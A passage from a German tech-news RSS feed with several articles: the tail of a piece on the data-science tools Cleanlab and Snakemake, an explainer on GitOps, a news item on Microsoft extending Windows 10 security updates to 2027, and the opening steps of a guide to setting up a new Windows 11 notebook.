<p class="wp-block-paragraph">Good machine learning datasets are hard to come by, because it’s expensive and time-consuming to create clean, properly labeled data. Sometimes, though, you have no choice but to use data that’s raw and inconsistent. <a href="https://github.com/cleanlab/cleanlab">Cleanlab</a> (as in, “cleans labels”) was made for this scenario.</p>



<p class="wp-block-paragraph">Cleanlab uses existing, high-quality machine learning datasets to analyze lower-quality, unlabeled (or poorly labeled) datasets. You create a model based on the original dataset, use Cleanlab to figure out what needs to be improved in the original dataset, then re-train using your automatically cleaned and adjusted dataset to see the difference.</p>



<p class="wp-block-paragraph">Cleanlab is data-model and data-framework agnostic, a powerful aspect of its design. It doesn’t matter if you’re running <a href="https://www.infoworld.com/article/2335194/what-is-pytorch-python-machine-learning-on-gpus.html">PyTorch</a>, OpenAI, scikit-learn, or <a href="https://www.infoworld.com/article/2255099/what-is-tensorflow-the-machine-learning-library-explained.html">Tensorflow</a>; Cleanlab can work with any classifier. It does, however, have specific workflows for common tasks like token classification, multi-labeling, regression, image segmentation and object detection, outlier detection, and so on. It’s worth perusing the <a href="https://github.com/cleanlab/examples">example set</a> to see for yourself how the process works and what results you can expect.</p>



<h2 class="wp-block-heading">Snakemake</h2>



<p class="wp-block-paragraph">Data science workflows are hard to set up, and that’s even harder to do in a consistent, predictable way. <a href="https://github.com/snakemake/snakemake">Snakemake</a> was created to automate the process, setting up data analysis workflows in ways that ensure everyone gets the same results. Many existing data science projects rely on Snakemake. The more moving parts you have in your data science workflow, the more likely you’ll benefit from automating that workflow with Snakemake.</p>



<p class="wp-block-paragraph">Snakemake workflows resemble GNU Make workflows—you define the steps of the workflow with rules, which specify what they take in, what they put out, and what commands to execute to accomplish that. Workflow rules can be multithreaded (assuming that gives them any benefit), and configuration data can be piped in from <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON</a> or <a href="https://www.infoworld.com/article/2336307/7-yaml-gotchas-to-avoidand-how-to-avoid-them.html">YAML</a> files. You can also define functions in your workflows to transform data used in rules, and write the actions taken at each step to logs.</p>



<p class="wp-block-paragraph">Snakemake jobs are designed to be portable—they can be deployed on any <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes-managed environment</a>, or in specific cloud environments like Google Cloud Life Sciences or Tibanna on AWS. Workflows can be “frozen” to use a specific set of packages, and successfully executed workflows can have unit tests automatically generated and stored with them. And for long-term archiving, you can store the workflow as a tarball.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is GitOps? Extending devops to Kubernetes and beyond]]></title>
<description><![CDATA[Over the past decade, software development has been shaped by two closely related transformations. One is the rise of devops and continuous integration and continuous delivery (CI/CD), which brought development and operations teams together around automated, incremental software delivery.



The ...]]></description>
<link>https://tsecurity.de/de/3665667/ai-nachrichten/what-is-gitops-extending-devops-to-kubernetes-and-beyond/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665667/ai-nachrichten/what-is-gitops-extending-devops-to-kubernetes-and-beyond/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:29 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past decade, software development has been shaped by two closely related transformations. One is the rise of <a href="https://www.infoworld.com/article/2255028/what-is-devops-bringing-dev-and-ops-together-for-better-software.html">devops</a> and <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration and continuous delivery</a> (CI/CD), which brought development and operations teams together around automated, incremental software delivery.</p>



<p class="wp-block-paragraph">The other is the shift from monolithic applications to distributed, cloud-native systems built from microservices and containers, typically managed by orchestration platforms such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>.</p>



<p class="wp-block-paragraph">While Kubernetes and similar platforms simplify many aspects of running distributed applications, operating these systems at scale is still complicated. Configuration sprawl, environment drift, and the need for rapid, reliable change all introduce operational challenges. GitOps emerged as a way to address those challenges by extending familiar devops and CI/CD techniques beyond application code and into infrastructure and system configuration.</p>



<p class="wp-block-paragraph">At the heart of GitOps is the concept of <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> (IaC). In a GitOps model, not only application code but also infrastructure definitions, deployment configurations, and operational settings are described in files stored in a version control system. Automated processes continuously compare the running system with those declarations and work to bring the live environment back into alignment when differences appear.</p>



<p class="wp-block-paragraph">In this approach, the version control repository serves as the system of record for how applications and their supporting infrastructure should look in production. Changes flow through the same review, approval, and automation pipelines that developers already use for software, bringing greater consistency, traceability, and repeatability to cloud-native operations.</p>



<p class="wp-block-paragraph">At a high level, GitOps refers to a set of operational practices for managing cloud-native systems using declarative configuration, version control, and automated reconciliation. Rather than treating infrastructure and application configuration as mutable runtime state, GitOps treats them as versioned artifacts that move through the same review, testing, and deployment processes as application code.</p>



<h2 class="wp-block-heading"><strong>GitOps defined</strong></h2>



<p class="wp-block-paragraph">The term GitOps was originally coined and popularized by Weaveworks, which helped formalize the approach in the context of Kubernetes operations. While that early work shaped the way GitOps was discussed and implemented, GitOps has since evolved into a broadly adopted, vendor-neutral pattern. Today, it describes a shared set of ideas rather than a specific product or platform.</p>



<p class="wp-block-paragraph">The defining characteristic of GitOps is its reliance on declarative configuration stored in a version control system. Instead of issuing imperative commands to change live systems, teams describe the desired state of applications and infrastructure in configuration files. Automated agents then continuously compare that declared state with what is actually running and work to reconcile any differences. This pull-based model—where systems converge toward the desired state defined in version control—provides built-in drift detection, repeatability, and a clear audit trail for every change.</p>



<p class="wp-block-paragraph">Because GitOps centers on configuration files stored in a version control system, familiar software development practices carry over naturally. Changes are proposed through commits, reviewed before being accepted, and tracked over time. Rollbacks are accomplished by reverting to known-good versions, and the history of how a system evolved is preserved alongside the configuration itself.</p>



<p class="wp-block-paragraph">While the use of <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git</a> as the version control system is not strictly required, it has become the default choice because of its ubiquity in modern devops workflows and its strong support for collaboration and change management, so its place in the name has stuck.</p>



<aside class="sidebar">
<h3><strong> GitOps vs. IaC </strong></h3>
<p>Infrastructure as code (IaC) and GitOps are closely related, but they solve different problems. </p>
<p>IaC focuses on how infrastructure is defined. Servers, networks, and services are described using declarative configuration files, which are then applied by automation tools. GitOps builds on IaC by adding an operating model around those definitions. In a GitOps workflow, the desired state of systems is stored in a version control repository and treated as the system of record. Automated agents continuously compare the running environment with that desired state and reconcile any differences.</p>
<p>The key distinction is persistence. IaC provisions infrastructure; GitOps keeps systems in the intended state over time. By using pull-based reconciliation and continuous drift detection, GitOps extends IaC into a day-to-day operational discipline.
</p>

</aside>



<h2 class="wp-block-heading"><strong>What is the CI/CD process?</strong></h2>



<p class="wp-block-paragraph">A complete look at CI/CD is beyond the scope of this article—<a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">see the InfoWorld explainer on the subject</a>—but we need to say a few words about CI/CD because it’s at the core of how GitOps works. The <em>continuous integration</em> half of CI/CD is enabled by version control repositories like Git: Developers can make constant small improvements to their codebase, rather than rolling out huge, monolithic new versions every few months or years. The <em>continuous deployment</em> piece is made possible by automated systems called <em>pipelines</em> that build, test, and deploy the new code to production.</p>



<p class="wp-block-paragraph">Again, we keep talking about <em>code </em>here, and that usually summons up visions of executable code written in a programming language such as C or Java or JavaScript. But in GitOps, the “code” we’re managing is largely made up of configuration files. This isn’t just a minor detail — it’s at the heart of what GitOps does. These config files are, as we’ve said, the “single source of truth” describing what our system should look like. They are <em>declarative </em>rather than instructive. That means that instead of saying “start up ten servers,” the configuration file will simply say, “this system includes ten servers.”</p>



<p class="wp-block-paragraph"><strong>GitOps and Kubernetes</strong></p>



<p class="wp-block-paragraph">GitOps first took hold in the Kubernetes ecosystem, where declarative configuration and continuous reconciliation are core design principles. As a result, Kubernetes remains the most common and best-understood environment for applying GitOps practices. A typical GitOps-driven update process for a Kubernetes application looks like this:</p>



<ol start="1" class="wp-block-list">
<li>A developer proposes a change by committing updated application code or configuration to a version control repository, usually through a pull request.</li>



<li>That change is reviewed and approved, then merged into the main branch.</li>



<li>The merge triggers an automated CI/CD pipeline that tests the change, builds new artifacts if needed, and publishes them to a registry.</li>



<li>A GitOps controller or similar automated agent detects the updated desired state stored in version control.</li>



<li>The controller compares that desired state with the current state of the Kubernetes cluster and applies the necessary changes to bring the cluster back into alignment.</li>
</ol>



<p class="wp-block-paragraph">This pull-based reconciliation loop—where the cluster continuously converges toward the desired state defined in version control—is central to how GitOps works in practice. While Kubernetes provides a natural fit for this model, it represents just one canonical use case. The same patterns increasingly apply to infrastructure provisioning, policy enforcement, and multi-cluster operations beyond Kubernetes itself.</p>



<h2 class="wp-block-heading"><strong>GitOps tooling in practice: Argo CD, Flux, and the ecosystem</strong></h2>



<p class="wp-block-paragraph">GitOps is enabled by a set of tools that embody the principles we’ve outlined, with some open-source projects emerging as de facto standards in cloud-native environments.</p>



<p class="wp-block-paragraph">At the center of the GitOps ecosystem is Argo CD, an open-source controller that continuously monitors a version control repository and ensures that the state of running systems matches the declared desired state. Argo CD is widely used in Kubernetes environments because it directly implements pull-based reconciliation: it compares the desired state stored in Git with the cluster’s actual state and applies changes to correct any drift.</p>



<p class="wp-block-paragraph">Alongside Argo CD, Flux is another prominent open source GitOps engine. Both Flux and Argo CD help teams adopt GitOps workflows by managing the synchronization loop between code and runtime, but they differ in operational philosophy, integration surfaces, and ecosystem fit.</p>



<p class="wp-block-paragraph">GitOps tooling often appears as part of broader platforms or integrated stacks rather than as isolated utilities. For example, <a href="https://www.infoworld.com/article/4006297/top-6-multicloud-management-systems.html">multicloud and cluster management solutions</a> now routinely include GitOps support, with Argo CD or compatible controllers bundled alongside deployment, policy, and governance capabilities.</p>



<p class="wp-block-paragraph">In addition to Flux and Argo CD, a range of auxiliary tools contribute to a complete GitOps ecosystem: policy as code engines (e.g., Open Policy Agent), drift detection systems, and infrastructure provisioning tools that mesh with Git-centric workflows.</p>



<h2 class="wp-block-heading"><strong>GitOps, devops, and normalization</strong></h2>



<p class="wp-block-paragraph">GitOps grew out of the same forces that drove devops into mainstream IT practice, and in its early days, GitOps was often discussed as a distinct extension of devops, specifically tailored to managing declarative infrastructure and Kubernetes-centric systems. At the time, GitOps was still relatively new and <a href="http://infoworld.com/article/2265546/why-gitops-isnt-ready-for-the-mainstream-yet.html">not yet widely adopted outside cloud-native pioneers</a>.</p>



<p class="wp-block-paragraph">Over the last several years, however, GitOps practices have become deeply woven into how teams operate modern cloud environments. Rather than being treated as an optional add-on or marketing term, the core ideas of GitOps — using version-controlled, declarative configuration and automated reconciliation loops to continuously align running systems with intended state — are now part of standard operational practice in many Kubernetes-centric shops. In this sense, GitOps has shifted from a buzzword about what might be possible to a baseline pattern for cloud-native operations, much like devops itself did years earlier.</p>



<p class="wp-block-paragraph">In environments where Kubernetes and declarative systems are the norm, GitOps workflows are the default way teams manage and deploy change. Many organizations now implement these patterns without explicitly calling them “GitOps,” just as few teams today explicitly say they do “CI/CD” even though continuous pipelines are taken for granted. The term has become less prominent in marketing, but its practices are often embedded in pipelines, controllers, and platform tooling.</p>



<p class="wp-block-paragraph">That normalization shows up in how GitOps workflows are woven into broader operational frameworks. For example, <a href="https://www.infoworld.com/article/2338225/what-is-platform-engineering-evolving-devops.html">platform engineering</a> teams frequently build internal developer platforms that encapsulate GitOps patterns behind standardized developer APIs, making the pattern invisible to most application teams while still providing the auditability and automation that GitOps promises.</p>



<h2 class="wp-block-heading"><strong>GitOps beyond Kubernetes: infrastructure, policy, and drift</strong></h2>



<p class="wp-block-paragraph">While GitOps first gained traction as a way to manage Kubernetes deployments, its core principles apply broadly to infrastructure and operational concerns beyond any single orchestration platform. GitOps treats desired state as declarative configuration stored in version control and uses automated reconciliation to ensure running systems align with that state. That pattern naturally extends to infrastructure provisioning, policy enforcement, configuration drift detection, and governance workflows across diverse environments.</p>



<p class="wp-block-paragraph">In modern operational stacks, infrastructure is increasingly defined declaratively, whether through Kubernetes manifests, Terraform modules, or other infrastructure-as-code formats. Storing these declarations in version control enables the same peer-review, auditability, and rollback practices developers already use for application code. Automated tooling then continuously detects when the live infrastructure diverges from the declared state and works to bring it back into alignment, reducing the risk of configuration drift and inadvertent misconfigurations.</p>



<p class="wp-block-paragraph">Configuration drift — the state where an environment has diverged from what’s declared in version control — remains a major operational headache, especially in complex, dynamic systems. Drift can arise from ad hoc fixes, emergency updates, or manual changes made outside normal pipelines, and it can lead to inconsistencies, outages, and security gaps. By continually checking running systems against the desired state in Git and reconciling deviations automatically, GitOps workflows help teams keep environments predictable and auditable.</p>



<p class="wp-block-paragraph">Policy enforcement and compliance are another natural extension of GitOps patterns. As organizations adopt declarative practices, policy-as-code engines and drift detection systems can be woven into GitOps pipelines to validate that proposed configurations meet security, compliance, or operational standards before they’re ever applied to running systems. Embedding policy checks into declarative workflows brings consistency to governance while preserving the automation and speed that devops teams expect.</p>



<h2 class="wp-block-heading"><strong>GitOps – beyond Kubernetes</strong></h2>



<p class="wp-block-paragraph">GitOps began as a way to bring devops discipline to Kubernetes operations, but its longer-term impact has been more subtle. In many ways, it’s been absorbed into the fabric of modern cloud-native operations, where declarative configuration, version control, and automated reconciliation are taken for granted. Today, GitOps is less about a specific set of tools or a named practice and more about an operational mindset. By treating infrastructure and configuration as versioned, auditable artifacts and relying on automation to enforce consistency, GitOps helps teams manage complexity at scale. Even as the term itself fades from the spotlight, the practices it introduced continue to shape how distributed systems are built, deployed, and operated.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft schickt jetzt eine Mail an Windows-10-Nutzer: Das steht drin]]></title>
<description><![CDATA[Microsoft verschickt jetzt an Windows-10-Nutzer eine Mail, in der das Unternehmen darüber informiert, dass es den Support für Windows 10 um ein weiteres Jahr verlängert. Windows 10 gehört also nicht zu den zahlreichen Programmen, die Microsoft in diesem Jahr ausmustert. Das steht in der Mail, die...]]></description>
<link>https://tsecurity.de/de/3665531/it-nachrichten/microsoft-schickt-jetzt-eine-mail-an-windows-10-nutzer-das-steht-drin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665531/it-nachrichten/microsoft-schickt-jetzt-eine-mail-an-windows-10-nutzer-das-steht-drin/</guid>
<pubDate>Mon, 13 Jul 2026 16:18:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft verschickt jetzt an Windows-10-Nutzer eine Mail, in der das Unternehmen darüber informiert, dass es den <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates-sensation.html" target="_blank" rel="noreferrer noopener">Support für Windows 10 um ein weiteres Jahr verlängert. </a>Windows 10 gehört also nicht <a href="https://www.pcwelt.de/article/3022930/microsoft-stellt-diese-windows-und-office-versionen-2026-ein.html" target="_blank" rel="noreferrer noopener">zu den zahlreichen Programmen, die Microsoft in diesem Jahr ausmustert.</a> Das steht in der Mail, die zumindest in den USA an Windows-10-Nutzer geht:</p>



<p>Die Mail beginnt mit der Überschrift “Bleiben Sie ein weiteres Jahr sicher” (in englischer Sprache). Danach erklärt Microsoft, dass die Windows 10 Extended Security Updates (ESU) bis zum 12. Oktober 2027 verlängert werden. Und somit anders als ursprünglich geplant nicht bereits am 12. Oktober 2026 auslaufen. Voraussetzung ist natürlich, <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html">dass Sie sich für die Windows 10 Extended Security Updates (ESU) angemeldet haben.</a></p>



<p>Wie das US-amerikanische IT-Nachrichtenportal Windowslatest <a href="https://www.windowslatest.com/2026/07/13/microsofts-new-windows-10-esu-email-doesnt-push-windows-11-just-reminds-users-of-the-year-extension/">anmerkt</a>, landet diese Mail in Outlook im “Sonstige”-Ordner und nicht im “Relevant”-Ordner. Es besteht also das Risiko, dass viele Outlook-Nutzer diese offizielle Microsoft-Mail übersehen.</p>



<h2 class="wp-block-heading">Microsoft zeigt plötzlich Verständnis</h2>



<p>Im Text der Mail erklärt Microsoft sein (plötzliches) Verständnis dafür, dass der Umzug zu einem <a href="https://www.pcwelt.de/article/2901492/5-warnsignale-dass-ihr-pc-ein-upgrade-braucht-unnoetige-kosten-vermeiden.html" target="_blank" rel="noreferrer noopener">neuen PC </a>oder einem<a href="https://www.pcwelt.de/article/2945534/neues-notebook-diese-10-schritte-sollten-sie-sofort-erledigen.html" target="_blank" rel="noreferrer noopener"> neuen Notebook</a> Zeit braucht (in den vergangenen Jahren hatte es Microsoft an diesem Verständnis fehlen lassen. Immerhin sollte der Support für Windows 10 ja bereits im Oktober 2025 enden. Dann kam die erste Verlängerung bis Oktober 2026 und kürzlich die bis Oktober 2027). Vermutlich waren es die nach wie vor <a href="https://www.pcwelt.de/article/3183702/windows-11-verliert-weltweit-nutzer-schock-fur-microsoft.html" target="_blank" rel="noreferrer noopener">hohen Marktanteile von Windows 10,</a> die Microsoft so verständnisvoll werden ließen.</p>



<p>Über einen “Mehr erfahren”-Button gelangt der interessierte Nutzer zu einer Webseite mit weiteren Informationen. Dabei handelt es sich um die <a href="https://www.microsoft.com/de-de/windows/extended-security-updates" target="_blank" rel="noreferrer noopener">offizielle Info-Seite von Microsoft zu den ESU-Updates für Windows 10.</a></p>



<h2 class="wp-block-heading">Wer erhält diese Mail?</h2>



<p>Diese Mail geht laut Windowslatest nur an Nutzer, die sich bereits für das ESU-Programm für Windows 10 angemeldet haben. Wer sich aber noch nicht für das ESU-Programm angemeldet hat, erhält diese Mail nicht. Diese Mail dient also nicht dazu, überhaupt erst über das ESU-Programm zu informieren, sondern nur dazu, dass alle ESU-Nutzer von der Verlängerung um ein weiteres Jahr erfahren. Wobei man zu Microsofts Ehrenrettung sagen muss, dass es im Juli 2026 fahrlässig ist, Windows 10 ohne ESU-Updates zu verwenden: In so einem Windows-10-System wurden seit Oktober 2025 keine Lücken mehr geschlossen.</p>



<p>Sie müssen auf diese Mail in keiner Weise reagieren oder aktiv werden. Anders sieht es aus, wenn Sie Windows 10 tatsächlich noch ohne ESU-Updates nutzen sollten: <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank" rel="noreferrer noopener">Hier erklären wir, wie Sie sich dafür anmelden.</a> Das sollten Sie jetzt sofort machen.</p>



<p><a href="https://www.pcwelt.de/article/2958705/pc-upgrade-ssd-ram-cpu-grafikkarte.html" target="_blank" rel="noreferrer noopener">PC-Upgrade statt Neukauf: So sparen Sie Hunderte Euro</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues Notebook? Diese 10 Schritte sollten Sie sofort erledigen]]></title>
<description><![CDATA[Ein neues Notebook fühlt sich an wie ein digitaler Neubeginn: schnell, sauber, bereit für alles. Doch bevor Sie mit dem neuen Gerät loslegen, empfehlen wir einen kurzen System-Check. Denn viele Geräte leiden ab Werk an unnötiger Software, suboptimalen Einstellungen und deaktivierten Sicherheitsfu...]]></description>
<link>https://tsecurity.de/de/3665427/windows-tipps/neues-notebook-diese-10-schritte-sollten-sie-sofort-erledigen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665427/windows-tipps/neues-notebook-diese-10-schritte-sollten-sie-sofort-erledigen/</guid>
<pubDate>Mon, 13 Jul 2026 15:41:22 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neues Notebook fühlt sich an wie ein digitaler Neubeginn: schnell, sauber, bereit für alles. Doch bevor Sie mit dem neuen Gerät loslegen, empfehlen wir einen kurzen System-Check. Denn viele Geräte leiden ab Werk an unnötiger Software, suboptimalen Einstellungen und deaktivierten Sicherheitsfunktionen.</p>



<p>Wir zeigen Ihnen <strong>die 10 wichtigsten Schritte</strong>, die Sie direkt nach dem ersten Einschalten erledigen sollten – damit Ihr Windows-11-Notebook von Anfang an mit voller Leistung und bestmöglichem Schutz läuft.</p>



<h2 class="wp-block-heading">1. Windows einrichten und Updates installieren</h2>



<p>Der erste Start ist vielleicht der wichtigste. Nehmen Sie sich die paar Minuten und richten Sie Windows sorgfältig ein, das kann Ihnen später manchen Ärger ersparen. Nach der Anmeldung (egal ob mit Microsoft- oder lokalem Konto) sollten Sie sofort nach Updates suchen:</p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen → Windows Update</strong>.</li>



<li>Klicken Sie auf <strong>„Nach Updates suchen“</strong> und installieren Sie alles, was hier angeboten wird.</li>



<li>Starten Sie den Rechner neu – und wiederholen Sie den Vorgang, bis keine Updates mehr anstehen.</li>
</ol>



<p>Viele neue Notebooks liegen vor dem Verkauf monatelang im Lager. Deswegen fehlen oft wichtige Sicherheits- und Treiber-Updates. Optional können Sie auf der Website Ihres Herstellers (zum Beispiel <a href="https://lenovo.7eer.net/c/230135/217393/3786?u=https://support.lenovo.com/de/de/solutions/ht003029-lenovo-system-update-update-drivers-bios-and-applications&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Lenovo</a>, <a href="https://www.tkqlhce.com/click-1676582-15735591?sid=rss&amp;url=https://www.dell.com/support/home/de-de?app=drivers" target="_blank" rel="noreferrer noopener">Dell</a>, <a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://support.hp.com/de-de/drivers/laptops" target="_blank" rel="noreferrer noopener">HP</a>, <a href="https://www.asus.com/de/support/download-center/" target="_blank" rel="noreferrer noopener">Asus</a>) zusätzlich nach aktuellen Treibern für Grafik, WLAN oder Chipsatz suchen. Das sorgt für mehr Stabilität und Performance.</p>



<p><strong>Tipp</strong>: Wenn Windows Sie mit Forderungen oder Empfehlungen zum Microsoft-Konto nervt, Sie das aber nicht wollen, dann lesen Sie unseren Ratgeber <a href="https://www.pcwelt.de/article/1513299/windows-ohne-microsoft-konto-nutzen.html" target="_blank" rel="noreferrer noopener">Windows ohne Microsoft-Konto nutzen – so geht’s</a>.</p>



<p><strong>Sie überlegen, ein neues Notebook zu kaufen?</strong> Hier finden Sie unsere <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Laptop-Tests mit Kaufempfehlung für jeden Einsatzzweck</a>. Notebooks für Schüler und Studenten stellen wir <a href="https://www.pcwelt.de/article/1204273/die-besten-laptops-fuer-studenten-und-schueler-im-test.html" target="_blank" rel="noreferrer noopener">in diesem Beitrag vor</a>. Und wenn Sie auf der Suche nach einem Schnäppchen sind, dann lesen Sie hier unsere <a href="https://www.pcwelt.de/article/2771173/test-die-besten-laptops-unter-500-euro-2.html" target="_blank" rel="noreferrer noopener">Tests der besten Laptops unter 500 Euro</a>.</p>



<h2 class="wp-block-heading">2. Unnötige Software finden und deinstallieren</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54eaf37dcaa"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Windows-11-Apps-deinstallieren.png?w=1200" alt="Windows 11 Apps deinstallieren" class="wp-image-2945550" width="1200" height="644" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Unnötige Programme sollten Sie gleich am Anfang deinstallieren. Das schafft Platz und beseitigt mögliche Systembremsen.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Hersteller lieben es, Notebooks mit Testversionen, Tools und Mini-Games zu überfrachten – als Nutzer hat man für diese „Bloatware“ oft weniger Begeisterung. Solche überflüssigen Programme fressen Speicher, starten gerne im Hintergrund und können Ihr schönes neues System ausbremsen. Deshalb gilt: Am besten gleich am Anfang ausmisten.</p>



<p><strong>So gehen Sie vor:</strong></p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen → Apps → Installierte Apps</strong>.</li>



<li>Sortieren Sie nach Installationsdatum oder Hersteller.</li>



<li>Deinstallieren Sie alles, was Sie nicht kennen oder brauchen (etwa „<a href="https://www.jdoqocy.com/click-1676582-13998108?sid=rss">McAfee Trial</a>“, „Candy Crush“, oder die „Booking.com-App“).</li>
</ol>



<p><strong>Tipp: </strong>Noch gründlicher klappt’s mit Tools wie <a href="https://www.pcwelt.de/article/1135390/revo-uninstaller.html" target="_blank" rel="noreferrer noopener">Revo Uninstaller</a>, das auch versteckte Reste in der Registry aufspüren kann. Profi-Tipps zur Tiefenreinigung <a href="https://www.pcwelt.de/article/1141000/windows-system-cleaner.html" target="_blank" rel="noreferrer noopener">finden Sie hier</a>. Weitere Tipps zur Beschleunigung von Windows <a href="https://www.pcwelt.de/article/1165056/so-bringen-sie-ihr-windows-schnell-auf-vordermann-fruehjahrsputz.html" target="_blank" rel="noreferrer noopener">erklären wir in diesem Beitrag</a>.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading">3. Wichtige Programme und Tools installieren</h2>



<p>Jetzt kommt der kreative Teil: Ihr Notebook bekommt seine persönliche Grundausstattung. Diese Software sollte auf keinem neuen Windows-11-Gerät fehlen:</p>



<ul class="wp-block-list">
<li><strong>Browser:</strong> <a href="https://www.google.com/intl/de_de/chrome/" target="_blank" rel="noreferrer noopener">Chrome</a>, <a href="https://www.firefox.com/de/" target="_blank" rel="noreferrer noopener">Firefox</a> oder <a href="https://brave.com/de/download/" target="_blank" rel="noreferrer noopener">Brave</a> – je nach Geschmack. Gamer greifen zu <a href="https://www.pcwelt.de/article/2831212/opera-gx-boostet-fps-beim-zocken-mit-cpu-und-ram-limitter.html" target="_blank" rel="noreferrer noopener">Opera GX</a>.</li>



<li><strong>Office-Suite:</strong> <a href="https://www.microsoft.com/de-de/microsoft-365?market=de" target="_blank" rel="noreferrer noopener">Microsoft 365</a>, <a href="https://de.libreoffice.org/" target="_blank" rel="noreferrer noopener">LibreOffice</a> oder <a href="https://workspace.google.com/intl/de/products/docs/" target="_blank" rel="noreferrer noopener">Google Docs</a>.</li>



<li><strong>PDF-Tool:</strong> <a href="https://get.adobe.com/de/reader/" target="_blank" rel="noreferrer noopener">Adobe Acrobat Reader</a>, <a href="https://www.sumatrapdfreader.org/download-free-pdf-viewer" target="_blank" rel="noreferrer noopener">SumatraPDF</a> oder <a href="https://www.pdf24.org/de/" target="_blank" rel="noreferrer noopener">PDF24</a>.</li>



<li><strong>Antivirus:</strong> Windows Defender ist solide, wer mehr Kontrolle will, installiert ein externes Tool. Hier finden Sie die <a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">aktuell besten Antivirus-Programme</a>.</li>



<li><strong>Passwort-Manager:</strong> <a href="https://bitwarden.com/de-de/download/" target="_blank" rel="noreferrer noopener">Bitwarden</a>, <a href="https://www.kqzyfj.com/click-3275038-14510609?sid=rss&amp;url=https://1password.com/de/downloads/windows" target="_blank" rel="noreferrer noopener">1Password</a> oder <a href="https://keepassxc.org/download/" target="_blank" rel="noreferrer noopener">KeePassXC</a>. Mehr Auswahl gibt es hier: <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">die besten Passwort-Manager</a>.</li>



<li><strong>Cloud-Backup:</strong> <a href="https://www.microsoft.com/de-de/microsoft-365/onedrive/download?market=de" target="_blank" rel="noreferrer noopener">Onedrive</a>, <a href="https://www.dropbox.com/de/install" target="_blank" rel="noreferrer noopener">Dropbox</a> oder <a href="https://www.idrive.com/de/online-backup-download" target="_blank" rel="noreferrer noopener">iDrive</a>.</li>
</ul>



